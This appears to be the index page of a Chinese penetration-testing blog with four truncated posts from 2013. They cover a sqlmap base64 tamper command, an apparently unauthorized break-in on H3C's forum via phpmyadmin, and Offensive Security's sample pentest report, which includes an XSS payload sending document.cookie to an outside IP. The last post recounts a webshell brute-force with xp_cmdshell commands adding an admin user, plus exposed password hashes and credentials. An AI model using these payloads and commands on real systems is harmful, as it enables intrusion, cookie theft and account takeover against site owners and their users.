SQlMap Tamper注入Base64编码注入点

作者:Secer 发布时间:November 7, 2013 分类:渗透测试,原创文章

WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?

sqlmap的tamper里有个base64encode.py

使用如下

sqlmap -u https://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs

 

sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”

其中常用到的bypass脚本绕过SQLMAP主要两个脚本:

space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
首先确定目标数据库版本,然后选择相应的脚本。
-v 3 --batch --tamper "space2hash.py"

还有其他一些插件:
encodes编码 ——charencode.py
base64编码 —— base64encode.py
替换空格和关键字 —— halfversionedmorekeywords.py

H3C技术论坛pma漏洞导致主站沦陷

作者:Secer 发布时间:October 8, 2013 分类:渗透测试

H3C技术论坛pma漏洞导致主站沦陷(内部绝密信息,大量用户资料泄漏)

这几天突然对华三的认证起了兴趣,于是去官方论坛下资料。。

clip_image002

下载资料还要JB。。。。
Dz X2,习惯性访问个目录看看,居然。。。

clip_image004

尼玛兴趣来了,看来我的华三币有门了。扫了扫,根目录有个phpmyadmin,还有个有意思的目录:
http://forum.h3c.com/phpmyadmin/setup/

阅读剩余部分...

一份Archmake.COM的渗透测试报告

作者:Secer 发布时间:September 24, 2013 分类:渗透测试

前言

这是offensive security发布的一份渗透测试报告样例。offensive security 是backtrack-linux.org、exploit-db.com的缔造者。

概述

Offensive security已经被授权对Archmake的外部网站进行一次渗透测试.测试评估的方式是模拟恶意的攻击者对公司进行目的明确的渗透.在初期的信息搜集阶段,发现Archmake公司仅仅只有一个web网站和一个邮件服务器.可供攻击的目标比较少.

在对网站的安全评估中,发现它安装了一个有漏洞的WordPress插件.成功利用这个漏洞,取得了WordPress的管理权限.然后反弹了一个交互式的shell并成功提到root权限.

获取了网站服务器的权限之后,开始对内网进行渗透,经过一番尝试,成功获取到了域管理员的权限.之后对内网进行拓扑分析,发现了内网的公司数据库并成功控制.这个数据库不仅存储了订单信息和客户资料,还保存了交易的相关信息.通过控制这个系统,攻击者可以直接提取现金.

测试过程

WordPress漏洞利用

在对目标系统进行搜集的时候发现网站采用了wordpress 3.3.1搭建.我们在对WordPress进行代码审计的同时,用WPScan扫描了目标网站,发现一个不安全的插件:

./wpscan.rb --url www.Archmake.com --enumerate p
____________________________________________________
__
_______
_____
\ \
/ / __ \ / ____|
\ \ /\ / /| |__) | (___
___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | |
____) | (__| (_| | | | |
\/ \/
|_|
|_____/ \___|\__,_|_| |_| v1.1
WordPress Security Scanner by ethicalhack3r.co.uk
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
| URL: http://www.Archmake.com/
| Started on Tue Jan 24 18:44:49 2012
[!] The WordPress theme in use is called "twentyeleven".
[!] The WordPress "http://www.Archmake.com/readme.html" file exists.
[!] WordPress version 3.3.1 identified from meta generator.
[+] Enumerating installed plugins...
Checking for 2892 total plugins... 100% complete.
[+] We found 2 plugins:
Name: relevanssi
Location: http://www.Archmake.com/wp-content/plugins/relevanssi/
Directory listing enabled? Yes.
Name: relevanssi
Location: http://www.Archmake.com/wp-content/plugins/relevanssi/
Directory listing enabled? Yes.
[+] There were 1 vulnerabilities identified from the plugin names:
[!] Relevanssi 2.7.2 WordPress Plugin Stored XSS Vulnerability
* Reference: http://www.exploit-db.com/exploits/16233/
[+] Finished at Tue Jan 24 18:45:30 2012 

正如WPScan扫描结果展示的一样,这个Relevanssi插件存在一个XSS漏洞.成功利用这个漏洞可以窃取到管理员的cookies.

第一步,我们在Archmake网站的搜索栏中插入如下代码:

<script>new Image().src="http://172.16.40.204/p.php?cookie="+document.cookie; </script>

clip_image001

阅读剩余部分...

从爆破shell到内网渗透(有亮点)

作者:Secer 发布时间:September 5, 2013 分类:渗透测试

最近比较忙,渗透经验少,手里一时也没有什么有含量的文章。下面是近期的一次渗透经历,先发在这,管理能给过不。

群里发了个一句话,http://www.xxx.cn/UploadFiles/201342155011266.asa

让爆破一下。

clip_image001

看来是个图片插马,通过台上传的。

爆破一句话,BurpSuite搞定

clip_image003

密码居然是‘x’。。。

下午有课,晚上接着搞,既然有了shell,试试提权什么的。

上传大马,发现上传不了,基本上目录都不可写了,UploadFiles目录也是,看来可能管理员加固了(后来提权之后发现果然该用户对该目录权限只有读取了)。命令也执行不了。

到C:\Program Files\MySQL下载User表user.MYD,打开得到root的HASH

localhost

root*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9

cmd5查了下123456,但是通过菜刀连接失败,好像3306端口没开(后来发现其实开了,估计被墙了)

是星外站,还有很多站点。一个个找找。找到个aspx站点,查看web.config,居然是sa,密码也是sa,通过菜刀连接,成功,可以执行命令。

EXEC master..xp_cmdshell 'net userxxxxxx xxxxxx123123 /add'

EXEC master..xp_cmdshell 'net localgroupadministrators xxxxxx /add'

3389登录成功。有360安全卫士和Symantec,添加用户居然没有拦截,人品好的原因?

既然是星外的站,读取下freehost密码吧,用它登录更保险一些。拿出星外杀器,读到密码。

C:\Documents and Settings\lnwjcomcn\桌面>exehack.exe-i

FreeHost ID:724

C:\Documents and Settings\lnwjcomcn\桌面>exehack.exe-u 724

UserName:freehostrunat

Password:c8a810ab197a1321ee4b37fcaa3ccd29!7

阅读剩余部分...